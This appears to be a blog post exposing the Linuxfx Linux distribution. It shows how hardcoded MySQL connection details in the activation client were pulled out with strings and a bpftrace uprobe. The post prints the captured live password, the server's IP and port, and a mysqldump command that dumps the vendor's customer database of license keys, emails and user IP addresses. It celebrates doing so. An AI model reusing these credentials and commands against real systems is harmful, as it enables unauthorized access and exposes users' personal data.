---
title: Dumping Linuxfx customers - A Windows-like distro including the spyware and activation
date: 2022-05-23T13:43:07+00:00
Author: Satya Nutella
---

Update: More information about Linuxfx after this article was published can be found [here](../linuxfx-part-2/).

## Introduction
[Linuxfx Software](https://linuxfx.org) is (or was, depending on when you read this) a Brazilian "software" "company" run by skids, for skids. Their primary "product" is an "operating system" called Linuxfx, which is a Microsoft Windows 11 clone that also clones the spyware and activation "features".

This "company" claims over 1 million users worldwide and over 15000 downloads this week, which will soon be disproved with the data from a full database dump of the entire machine registration database.

## Initial inspection
Inside the root filesystem at the file `casper/filesystem.squashfs` within the ISO file, you will find an executable at `/usr/bin/windowsfx-register`, which is the GUI activation program for Linuxfx. Running `file` on it we get:

```
(redacted)/usr/bin/windowsfx-register: a /usr/bin/env gbr3 script executable (binary data)
```

`gbr3` is the executable name for the runtime of [Gambas](http://gambas.sourceforge.net/en/main.html), an open source Visual Basic ripoff. (Apparently all the Linuxfx-specific applications in the image are written using this.)

Running `strings` on the file, we get:

```
<snip>
# Gambas Project File 3.0
Title=Linuxfx Serial Register
Startup=FMain
Icon=key.png
Version=0.0.75
Component=gb.image
Component=gb.gui.qt
Component=gb.form
Component=gb.db
Component=gb.db.mysql
Component=gb.net
Component=gb.net.curl
Authors="Rafael Rachid"
TabSize=2
Language=en_US
Packager=1
<snip>
[Connection]
Type="mysql"
Host="204.2.195.229"
User="linux896_keys"
NoPassword=False
RememberPassword=True
IgnoreCharset=True
DisplayMetadata=False
RememberTemplate=True
Database="linux896_machines"
Requests=["delete from machines where serial = \"66-4354-A7E1-FAE0AD28285A\"\n\n#select * from fxkeys where serial='66-4354-A7E1-FAE0AD28285A'\n#select * from machines where id='10700F85A2C200CF274E'\n#select * from fxkeys where serial='66-4354-A7E1-FAE0AD28285A'\n#select * from fxkeys where serial='10700F85A2C200CF274E'\n#select * from machines where id='10700F85A2C200CF274E'"]
Port="38695"
<snip>
```

The presence of `Component=gb.db.mysql` suggests that the application can connect to a MySQL database, and `Host="204.2.195.229"`, `User="linux896_keys"` and the various SQL statements in this executable `update machines set serial='<something>' where id='<something>'` suggests that the MySQL database is hosted on Linuxfx's servers.

## Dynamic analysis
I then downloaded the ISO file for Linuxfx, booted it in live mode and installed [bpftrace](https://bpftrace.org) using:

```
sudo apt-get update && sudo apt-get install -y bpftrace
```

After then I can monitor for MySQL connections with:

```
sudo bpftrace -e 'uprobe:/usr/lib/x86_64-linux-gnu/libmysqlclient.so.21:mysql_real_connect { printf("host=%s user=%s password=%s database=%s port=%d\n", str(arg1), str(arg2), str(arg3), str(arg4), arg5); }'
```

After opening the Linuxfx activation client and typing a random key into it, I get the following output:

```
host=204.2.195.229 user=linux896_keys password=@8YS%HE.hT}h database=linux896_machines port=38695
```

## Rekt
This gives us all the information we need to dump the database. Simply run the following command:

```
mysqldump -h 204.2.195.229 -u linux896_keys -P 38695 linux896_machines -p'@8YS%HE.hT}h' > rekt.sql
```

**QED**.

## So what's in the data?

- The `fxkeys` table contains the metadata for all registered Pro licenses for Linuxfx, consisting of the license key, email address and some other stuff (expiration, quantity of machines licensed, etc.).
- The `machines` table contains the metadata for all Linuxfx installations that has phoned home for the first time. It contains the IP address of the machine, some other metadata ripped off a IP geo-location service (set by the client), and the license key (if activated). There's only over 20000 entries in this file, a far cry from the 1M number claimed by the company.

With this information, anybody can correlate an activated installation along with its IP address with its owner's email address, which is Not Good™.
